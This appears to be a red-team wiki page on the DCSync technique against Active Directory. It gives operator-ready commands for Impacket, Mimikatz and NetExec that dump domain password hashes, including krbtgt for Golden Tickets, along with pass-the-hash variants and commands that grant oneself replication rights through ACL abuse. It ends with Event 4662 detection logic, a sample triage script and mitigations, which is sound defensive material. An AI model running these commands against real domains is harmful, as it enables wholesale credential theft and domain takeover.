DCSync
Overview
DCSync abuses Active Directory replication to request password hashes directly from a Domain Controller. Instead of running code on the DC or extracting NTDS.dit, DCSync uses the Directory Replication Service (DRS) protocol to replicate user credentials remotely. This requires the Replicating Directory Changes and Replicating Directory Changes All privileges — held by default by Domain Admins, Enterprise Admins, and the DC computer accounts.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1003.006 - OS Credential Dumping: DCSync
Prerequisites
- Account with replication privileges (Replicating Directory Changes + Replicating Directory Changes All)
- Default groups with these rights: Domain Admins, Enterprise Admins, DC computer accounts
- Network access to the DC (LDAP/RPC)
Techniques
DCSync with Impacket
# Impacket — dump all domain hashes
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc
# Dump specific user
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'Administrator'
# Dump krbtgt (for Golden Ticket)
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'
# With NTLM hash (pass-the-hash)
impacket-secretsdump '<domain>/<admin>@<dc_ip>' -hashes ':<ntlm_hash>' -just-dc
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
impacket-secretsdump '<domain>/<admin>@<dc_hostname>' -k -no-pass -just-dc
# Dump only NTLM hashes (skip Kerberos keys)
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-ntlm
DCSync with Mimikatz
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# DCSync specific user
mimikatz# lsadump::dcsync /domain:<domain> /user:Administrator
# DCSync krbtgt
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
# DCSync all accounts
mimikatz# lsadump::dcsync /domain:<domain> /all /csv
DCSync with NetExec
# NetExec — dump NTDS.dit hashes via DCSync
# https://github.com/Pennyw0rth/NetExec
nxc smb <dc_ip> -u <admin> -p <password> --ntds
# With hash
nxc smb <dc_ip> -u <admin> -H <ntlm_hash> --ntds
Check DCSync Permissions
Before attempting DCSync, verify that the account you hold has the required permissions:
# Impacket — check if secretsdump works
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<user>:<password>@<dc_ip>' -just-dc-user 'krbtgt' 2>&1
# PowerShell — check replication rights (needs the ActiveDirectory module for the AD: drive)
Import-Module ActiveDirectory
(Get-ACL "AD:DC=domain,DC=local").Access | Where-Object {
    $_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or   # Replicating Directory Changes
    $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # Replicating Directory Changes All
} | Select-Object IdentityReference, ObjectType, AccessControlType
Grant DCSync Rights (ACL Abuse)
If you have WriteDACL on the domain object, you can grant yourself DCSync rights:
# Impacket — add DCSync rights
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<user>:<password>' -action write -rights DCSync -principal '<target_user>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>
# PowerView (PowerShell)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <user> -Rights DCSync
Detection Methods
Network-Based Detection
- DRS replication requests (DsGetNCChanges) from non-DC sources
- RPC traffic on port 135/dynamic ports from unexpected hosts to DCs
Host-Based Detection
- Windows Security Event 4662 — access to directory service objects with the replication control-access GUIDs:
  - 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (Replicating Directory Changes)
  - 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (Replicating Directory Changes All)
- Event 4662 carrying these GUIDs from an account that is not a DC computer account indicates a likely DCSync attack
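One way to implement the Event 4662 check above, as an added example that is not part of the original page: the records below are constructed samples laid out like 4662 fields, the ALLOWED_REPLICATORS allow-list is an assumed set of DC computer accounts (extend it with any legitimate directory-sync service account), and 4662 is only written at all when the Audit Directory Service Access subcategory is enabled.

```python
import re
# Control-access right GUIDs exercised by DRS replication (from the page).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes All",
}
# Assumed allow-list: DC computer accounts plus any legitimate directory-sync account.
ALLOWED_REPLICATORS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
CONTROL_ACCESS = 0x100  # AccessMask bit that covers extended (control-access) rights

def replication_rights(event):
    """Names of the replication rights listed in the event's Properties field."""
    guids = (g.lower() for g in GUID_RE.findall(event.get("Properties", "")))
    return sorted(REPL_GUIDS[g] for g in guids if g in REPL_GUIDS)

def is_dcsync_candidate(event):
    """True when a principal outside the allow-list exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return False
    if not replication_rights(event):
        return False
    return event.get("SubjectUserName", "") not in ALLOWED_REPLICATORS

def triage(events):
    """Return (principal, rights) for every record that looks like DCSync."""
    return [(e["SubjectUserName"], replication_rights(e))
            for e in events if is_dcsync_candidate(e)]

# Constructed 4662 records (not real log data): Properties lists the access name, then the right GUIDs.
SAMPLE_EVENTS = [
    {   # normal DC-to-DC replication from an allow-listed account: ignore
        "EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
        "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account exercising both replication rights: DCSync candidate
        "EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
        "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # same user, an unrelated control-access right (constructed GUID): ignore
        "EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
        "Properties": "Control Access\n\t{00000000-0000-0000-0000-000000000000}",
    },
]

if __name__ == "__main__":
    for principal, rights in triage(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {principal}: {', '.join(rights)}")
```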
Mitigation Strategies
- Audit replication permissions — ensure only DCs and authorized accounts have replication rights
- Monitor Event 4662 — alert on replication requests from non-DC sources
- Remove unnecessary privileges — audit accounts with Replicating Directory Changes All
- Network monitoring — detect DRS traffic from non-DC hosts